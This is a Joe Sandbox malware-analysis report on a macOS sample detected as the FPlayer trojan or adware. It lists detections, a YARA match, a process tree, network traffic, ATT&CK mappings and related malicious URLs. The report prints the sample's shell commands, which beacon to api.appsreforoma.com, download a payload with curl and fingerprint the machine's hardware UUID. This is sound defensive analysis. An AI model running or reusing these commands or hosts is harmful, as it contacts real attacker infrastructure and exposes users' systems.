Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
malw_sampl

Overview

General Information

Sample name:malw_sampl
Analysis ID:1428695
MD5:d3e39930bca4c4b57f6e1f241f0a31c8
SHA1:ca71f4ee36076497b3989e61352da70fa4dfca8b
SHA256:02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "defaults" command used to read or modify user specific settings
Executes the "system_profiler" command used to collect detailed system hardware and software information
Mach-O contains sections with high entropy indicating compressed/encrypted content
Queries the macOS product version
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the systems hostname
Yara signature match

Classification

Analysis Advice

Exit code suggests that the sample could not be started, look at standard output/error streams for possible reason.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1428695
Start date and time:2024-04-19 11:44:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.14
CPU architecture:x86_64
Analysis Mode:default
Sample name:malw_sampl
Detection:MAL
Classification:mal68.mac@0/4@4/0
  • Excluded IPs from analysis (whitelisted): 17.253.83.204, 17.253.83.198, 23.62.177.105, 17.253.83.205, 17.57.21.63, 184.28.78.153, 184.28.78.137, 23.62.128.29
  • Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, lcdn-locator-usms11.apple.com.akadns.net, help-ar.apple.com.edgekey.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, a1943.dscgi3.akamai.net, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, init-cdn.itunes-apple.com.akadns.net, updates.cdn-apple.com.edgesuite.net
Command:/Users/bernard/Desktop/malw_sampl
PID:620
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • System is macvm-mojave
  • nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged
  • malw_sampl (MD5: d3e39930bca4c4b57f6e1f241f0a31c8) Arguments: /Users/bernard/Desktop/malw_sampl
    • sh New Fork (PID: 621, Parent: 620)
      • sh New Fork (PID: 622, Parent: 621)
      • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0
    • sh New Fork (PID: 623, Parent: 620)
    • defaults (MD5: fd63b6120ed5a062dbb6397bc9f8ffb8) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
    • sh New Fork (PID: 624, Parent: 620)
      • sh New Fork (PID: 625, Parent: 624)
      • system_profiler (MD5: 271feb2b4c0447da2b7ac523f13a4824) Arguments: system_profiler SPHardwareDataType
      • sh New Fork (PID: 626, Parent: 624)
      • awk (MD5: c2a01c11db999f97496e09e12f468956) Arguments: awk /UUID/ { print $3 }
    • sh New Fork (PID: 628, Parent: 620)
      • sh New Fork (PID: 629, Parent: 628)
      • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1
    • sh New Fork (PID: 630, Parent: 620)
      • sh New Fork (PID: 631, Parent: 630)
      • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593
    • sh New Fork (PID: 632, Parent: 620)
      • sh New Fork (PID: 633, Parent: 632)
      • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3
  • eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
  • cleanup
SourceRuleDescriptionAuthorStrings
malw_samplMacOS_Trojan_Fplayer_1c1fae37unknownunknown
  • 0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49
SourceRuleDescriptionAuthorStrings
00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmpMacOS_Trojan_Fplayer_1c1fae37unknownunknown
  • 0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49
00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmpMacOS_Trojan_Fplayer_1c1fae37unknownunknown
  • 0x37c9:$a: 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: malw_samplAvira: detected
Source: malw_samplVirustotal: Detection: 44%Perma Link
Source: malw_samplReversingLabs: Detection: 34%
Source: malw_samplJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: api.appsreforoma.com
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: malw_samplString found in binary or memory: http://crl.apple.com/root.crl0
Source: malw_samplString found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: malw_samplString found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: malw_samplString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: malw_samplString found in binary or memory: http://www.apple.com/appleca0
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: malw_samplString found in binary or memory: https://www.apple.com/appleca/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49403
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49347
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49402
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49401
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49345
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49389
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49388
Source: unknownNetwork traffic detected: HTTP traffic on port 49393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49401 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49399
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49393
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49392
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49391
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
Source: unknownNetwork traffic detected: HTTP traffic on port 49392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49404
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2

System Summary

barindex
Source: malw_sampl, type: SAMPLEMatched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORYMatched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORYMatched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: malw_sampl, type: SAMPLEMatched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORYMatched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORYMatched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: classification engineClassification label: mal68.mac@0/4@4/0
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620)Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1Jump to behavior
Source: /bin/sh (PID: 622)Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0Jump to behavior
Source: /bin/sh (PID: 629)Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1Jump to behavior
Source: /bin/sh (PID: 631)Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593Jump to behavior
Source: /bin/sh (PID: 633)Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3Jump to behavior
Source: /bin/sh (PID: 626)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }Jump to behavior
Source: submission: malw_samplMach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651)Random device file read: /dev/randomJump to behavior
Source: submissionCodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl
Source: malw_samplSubmission file: section __const with 7.40356224 entropy (max. 8.0)
Source: /usr/sbin/system_profiler (PID: 627)Sysctl read request: hw.model (6.2)Jump to behavior
Source: /bin/sh (PID: 623)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Source: /usr/sbin/system_profiler (PID: 627)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627)Sysctl read request: hw.memsize (6.24)Jump to behavior
Source: /bin/sh (PID: 621)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 628)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 630)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 632)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Source: /bin/sh (PID: 625)System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataTypeJump to behavior
Source: /usr/sbin/system_profiler (PID: 625)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Command and Scripting Interpreter
1
Scripting
Path Interception1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
1
Exfiltration Over Alternative Protocol
Abuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Invalid Code Signature
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Code Signing
Security Account Manager5
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428695 Sample: malw_sampl Startdate: 19/04/2024 Architecture: MAC Score: 68 37 api.appsreforoma.com 2->37 39 apis.apple.map.fastly.net 151.101.131.6, 443, 49345, 49347 FASTLYUS United States 2->39 41 4 other IPs or domains 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Machine Learning detection for sample 2->49 9 mono-sgen32 malw_sampl 2->9         started        11 xpcproxy nsurlstoraged 2->11         started        13 xpcproxy eficheck 2->13         started        signatures3 process4 process5 15 sh 9->15         started        17 sh 9->17         started        19 sh 9->19         started        21 3 other processes 9->21 process6 23 sh system_profiler 15->23         started        25 sh awk 15->25         started        27 sh curl 17->27         started        29 sh curl 19->29         started        31 sh curl 21->31         started        33 sh curl 21->33         started        process7 35 system_profiler 23->35         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


cam-macmac-stand
SourceDetectionScannerLabelLink
malw_sampl100%AviraPUA/OSX.FPlayer.A
malw_sampl44%VirustotalBrowse
malw_sampl34%ReversingLabsMacOS.PUA.FPlayer
malw_sampl100%Joe Sandbox ML
No Antivirus matches
SourceDetectionScannerLabelLink
apis.apple.map.fastly.net0%VirustotalBrowse
gateway.fe2.apple-dns.net0%VirustotalBrowse
api.appsreforoma.com2%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
apis.apple.map.fastly.net
151.101.131.6
truefalseunknown
gateway.fe2.apple-dns.net
17.248.193.16
truefalseunknown
api.appsreforoma.com
unknown
unknowntrueunknown
updates.cdn-apple.com
unknown
unknownfalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    192.229.211.108
    unknownUnited States
    15133EDGECASTUSfalse
    151.101.131.6
    apis.apple.map.fastly.netUnited States
    54113FASTLYUSfalse
    151.101.195.6
    unknownUnited States
    54113FASTLYUSfalse
    151.101.67.6
    unknownUnited States
    54113FASTLYUSfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    192.229.211.108AdobeAcrobat2.1.2.msiGet hashmaliciousAteraAgentBrowse
      440e4d.msiGet hashmaliciousAteraAgentBrowse
        digitalform.msiGet hashmaliciousAteraAgentBrowse
          e8iuAWz9pB.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
            winrar-x64-620b2.exeGet hashmaliciousUnknownBrowse
              Facture_160087511.htmlGet hashmaliciousScreenConnect ToolBrowse
                SecuriteInfo.com.Program.Itva.6.25933.6217.exeGet hashmaliciousUnknownBrowse
                  SecuriteInfo.com.Program.Itva.6.25933.6217.exeGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Win64.Evo-gen.247.3191.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                      file.exeGet hashmaliciousGlupteba, Mars Stealer, VidarBrowse
                        151.101.131.6Arc12645415Get hashmaliciousUnknownBrowse
                          https://www.flazio.com/server.htmlGet hashmaliciousUnknownBrowse
                            https://pub.marq.com/Downloadiiii-Fileee/Get hashmaliciousUnknownBrowse
                              todoist-setup.dmgGet hashmaliciousUnknownBrowse
                                DiogenesGet hashmaliciousUnknownBrowse
                                  https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199Get hashmaliciousUnknownBrowse
                                    Phoenix5b.ipaGet hashmaliciousUnknownBrowse
                                      B8rrKspvSE.sampleGet hashmaliciousDDosiaBrowse
                                        151.101.195.689.kkGet hashmaliciousUnknownBrowse
                                          Arc12645415Get hashmaliciousUnknownBrowse
                                            SME.dmgGet hashmaliciousUnknownBrowse
                                              3MVd1q7ygy.machoGet hashmaliciousUnknownBrowse
                                                https://www.flazio.com/server.htmlGet hashmaliciousUnknownBrowse
                                                  todoist-setup.dmgGet hashmaliciousUnknownBrowse
                                                    DiogenesGet hashmaliciousUnknownBrowse
                                                      http://nextnovatech.comGet hashmaliciousUnknownBrowse
                                                        Phoenix5b.ipaGet hashmaliciousUnknownBrowse
                                                          http://api.statisticsong.com/Get hashmaliciousUnknownBrowse
                                                            151.101.67.6Arc12645415Get hashmaliciousUnknownBrowse
                                                              3MVd1q7ygy.machoGet hashmaliciousUnknownBrowse
                                                                https://www.flazio.com/server.htmlGet hashmaliciousUnknownBrowse
                                                                  http://marketplace-item-details-98756222.zya.meGet hashmaliciousUnknownBrowse
                                                                    ztfzDO15sO.dmgGet hashmaliciousAMOS StealerBrowse
                                                                      http://api.statisticsong.com/Get hashmaliciousUnknownBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        apis.apple.map.fastly.net89.kkGet hashmaliciousUnknownBrowse
                                                                        • 151.101.3.6
                                                                        Arc12645415Get hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        SME.dmgGet hashmaliciousUnknownBrowse
                                                                        • 151.101.3.6
                                                                        3MVd1q7ygy.machoGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        https://www.flazio.com/server.htmlGet hashmaliciousUnknownBrowse
                                                                        • 151.101.3.6
                                                                        https://pub.marq.com/Downloadiiii-Fileee/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.3.6
                                                                        todoist-setup.dmgGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        http://marketplace-item-details-98756222.zya.meGet hashmaliciousUnknownBrowse
                                                                        • 151.101.195.6
                                                                        DiogenesGet hashmaliciousUnknownBrowse
                                                                        • 151.101.195.6
                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199Get hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        FASTLYUSPlay_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                        • 151.101.194.137
                                                                        http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2Get hashmaliciousUnknownBrowse
                                                                        • 151.101.194.208
                                                                        http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                        • 151.101.12.159
                                                                        https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83cGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.229
                                                                        https://librospy.com/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.64.114
                                                                        https://scsang.cn/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.12.157
                                                                        https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.52.193
                                                                        https://15ab0ot.pages.dev/Get hashmaliciousPayPal PhisherBrowse
                                                                        • 151.101.193.21
                                                                        https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728Get hashmaliciousUnknownBrowse
                                                                        • 151.101.66.137
                                                                        FASTLYUSPlay_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                        • 151.101.194.137
                                                                        http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2Get hashmaliciousUnknownBrowse
                                                                        • 151.101.194.208
                                                                        http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                        • 151.101.12.159
                                                                        https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83cGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.229
                                                                        https://librospy.com/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.64.114
                                                                        https://scsang.cn/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.12.157
                                                                        https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.52.193
                                                                        https://15ab0ot.pages.dev/Get hashmaliciousPayPal PhisherBrowse
                                                                        • 151.101.193.21
